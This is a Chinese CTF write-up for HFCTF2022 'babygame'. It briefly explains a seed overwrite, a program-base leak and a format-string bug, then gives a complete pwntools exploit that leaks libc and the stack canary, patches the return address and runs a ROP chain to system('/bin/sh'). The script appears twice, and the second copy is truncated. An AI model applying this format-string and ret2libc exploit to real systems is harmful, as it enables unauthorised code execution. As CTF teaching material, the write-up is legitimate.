[原创]【HFCTF2022】babygame
发表于: 2022-4-28 18:28 13574
(1)调用函数和被调用函数的canary的值是一样的
(2)fmt 写入之前需要事先在栈上布置好要修改的位置
从栈帧中可以看出 srand 的 seed(v5)是可以被我们覆盖修改的,那么我们可以外接在 linux 上用同一个 seed 跑好的随机数序列(windows 和 linux 对同样的 seed 跑出的随机数不太一样),达到绕过随机数检测的目的
不仅如此,栈上还放了一些残留的进程,我们可以利用这个来leak进程的基地址
简单地绕过随机数检测即可,属于攻防世界级别的入门题
明显的格式化字符串漏洞,可以用它泄露 libc、canary,并通过 fmt 修改栈上内容(比如返回地址)
通过金手指泄露 libc 和 canary,同时用 fmt 把返回地址修改为 main 函数;再次进入 main 后,在填回 canary 的同时利用栈溢出进行 rop
#encoding: utf-8 2
#!/usr/bin/python
import
sys
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
# pwntools globals for this target: verbose tube logging, and arch/os set to
# the 64-bit Linux binary so the packing helpers use the right word size.
context.update(log_level='debug', arch='amd64', os='linux')
def proof_of_work(sh):
    """Answer the remote service's sha256 proof-of-work prompt on tube *sh*.

    Reads the target digest printed after " == ", brute-forces the 4-character
    alphanumeric preimage with pwntools' ``mbruteforce`` and sends it back.
    ``string`` comes from the ``pwn`` star import.  This helper is never called
    in the local ``process`` run below; it is only needed against the remote.
    """
    sh.recvuntil(" == ")
    target = sh.recvline().strip().decode("utf8")
    alphabet = string.ascii_letters + string.digits

    def matches(candidate):
        return sha256(candidate.encode()).hexdigest() == target

    answer = mbruteforce(matches, alphabet, length=4, method='fixed')
    sh.sendlineafter("input your ????>", answer)
def z():
    """Attach gdb to the live target tube ``r`` (module global) for stepping."""
    # Only useful while the process is blocked on input; the call site below
    # is left commented out so the script runs unattended by default.
    gdb.attach(r)
# Local run of the challenge binary plus the matching libc; every symbol and
# gadget offset used later is only valid for this exact libc-2.31 build.
r = process(['./babygame'])
libc = ELF('./libc-2.31.so')
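##leak_proc_base
# Name input: 0x138 filler bytes followed by a 16-byte marker.  The program is
# expected to echo the buffer back; the 6 bytes right after the marker are
# taken as a pointer into the binary, and 0x1465 is the author's distance from
# that pointer to the image base.
pd = 0x108 * 'a' + 0x30 * 'a' + 'nameless' + 'nameless'
r.sendafter("Please input your name:", pd)
r.recvuntil('namelessnameless')
# recvn() blocks until all 6 bytes have arrived; recv(6) may return fewer and
# would then quietly produce a wrong base address.
elfbase = u64(r.recvn(6).ljust(8, '\x00')) - 0x1465
log.info('elfbase:' + hex(elfbase))
##set
# In-binary address used as the format-string write target later; per the
# write-up it presumably redirects the return back into main — verify.
read_addr = elfbase + 0x14B6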
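##dao_ru_random
# Load the 100 pre-computed round values, one per line (generated offline with
# the overwritten seed, as the write-up describes).  rstrip('\n') instead of
# line[:-1] so a final line without a trailing newline keeps its last
# character, and the with-block closes the file even if a read raises.
with open('test', 'r') as f:
    a = [f.readline().rstrip('\n') for _ in range(100)]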
# Play the 100 rounds: wait for the "round N" prompt, then answer with the
# move keyed on that round's pre-computed value in ``a``.  A value outside
# 0/1/2 sends nothing for that round.
winning_move = {'1': '2', '2': '0', '0': '1'}
for rnd, expected in enumerate(a, start=1):
    r.recvuntil('round %d' % rnd)
    reply = winning_move.get(expected)
    if reply is not None:
        r.sendline(reply)
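##golden_finger
# Format-string payload.  The two %p print the stack slots read back below as
# a libc pointer (14 chars) and the canary (18 chars); the %c width is the low
# 16 bits of read_addr minus those 32 characters already emitted, so %11$hn
# stores that half-word.  Padded to 0x28 bytes; the trailing 0x68 byte
# presumably sets up the write target on the stack (write-up point (2)) — verify.
pd = '%27$p%35$p'
pd += '%{}c%11$hn'.format((read_addr & 0xffff) - 32)
pd = pd.ljust(0x28, '\x00') + '\x68'
r.sendafter("Good luck to you.\n", pd)
# recvn() waits for the whole field; recv() may return a partial read, and
# int(..., 16) would then silently parse a truncated value.
# The leaked pointer lies 20 bytes into atoi in this libc build.
libcbase = int(r.recvn(14), 16) - (libc.sym['atoi'] + 20)
canary = int(r.recvn(18), 16)
log.success('libcbase:' + hex(libcbase))
log.success('canary:' + hex(canary))
log.success('read_addr:' + hex(read_addr))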
##set
# Final stage: system("/bin/sh") via a short ROP chain on the second pass
# through main.  0x23b72 and 0x22679 are gadget offsets in libc-2.31.so; the
# author labels one of them pop_rdi_ret, the other is presumably a bare ret
# for stack alignment — verify against this libc build.
system = libcbase + libc.sym['system']
pdt = libcbase + 0x23b72
##pop_rdi_ret
ret = libcbase + 0x22679
bin_sh = libcbase + next(libc.search('/bin/sh\x00'))
rop = flat([pdt, bin_sh, ret, system])
# Name buffer overflow: filler up to the canary slot, the leaked canary put
# back in place, 0x18 bytes up to the saved return address, then the chain.
filler = 'a' * (0x120 - 0x18)
pd = filler + p64(canary) + 'a' * 0x18 + rop
##z()
r.sendafter("Please input your name:", pd)
r.sendlineafter('round', str(1))
r.interactive()
#encoding: utf-8 2
#!/usr/bin/python
import
sys
from
pwn
import
*
from
LibcSearcher
import
*
from
pwnlib.util.iters
import
mbruteforce
from
hashlib
import
sha256
import
base64
# pwntools globals for this target: verbose tube logging, and arch/os set to
# the 64-bit Linux binary so the packing helpers use the right word size.
context.update(log_level='debug', arch='amd64', os='linux')
def proof_of_work(sh):
    """Answer the remote service's sha256 proof-of-work prompt on tube *sh*.

    Reads the target digest printed after " == ", brute-forces the 4-character
    alphanumeric preimage with pwntools' ``mbruteforce`` and sends it back.
    ``string`` comes from the ``pwn`` star import.
    """
    sh.recvuntil(" == ")
    target = sh.recvline().strip().decode("utf8")
    alphabet = string.ascii_letters + string.digits

    def matches(candidate):
        return sha256(candidate.encode()).hexdigest() == target

    answer = mbruteforce(matches, alphabet, length=4, method='fixed')
    sh.sendlineafter("input your ????>", answer)
def z():
    """Attach gdb to the live target tube ``r`` (module global) for stepping."""
    gdb.attach(r)
# Local run of the challenge binary plus the matching libc; every symbol and
# offset used later is only valid for this exact libc-2.31 build.
r = process(['./babygame'])
libc = ELF('./libc-2.31.so')
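##leak_proc_base
# Name input: 0x138 filler bytes followed by a 16-byte marker.  The program is
# expected to echo the buffer back; the 6 bytes right after the marker are
# taken as a pointer into the binary, and 0x1465 is the author's distance from
# that pointer to the image base.
pd = 0x108 * 'a' + 0x30 * 'a' + 'nameless' + 'nameless'
r.sendafter("Please input your name:", pd)
r.recvuntil('namelessnameless')
# recvn() blocks until all 6 bytes have arrived; recv(6) may return fewer and
# would then quietly produce a wrong base address.
elfbase = u64(r.recvn(6).ljust(8, '\x00')) - 0x1465
log.info('elfbase:' + hex(elfbase))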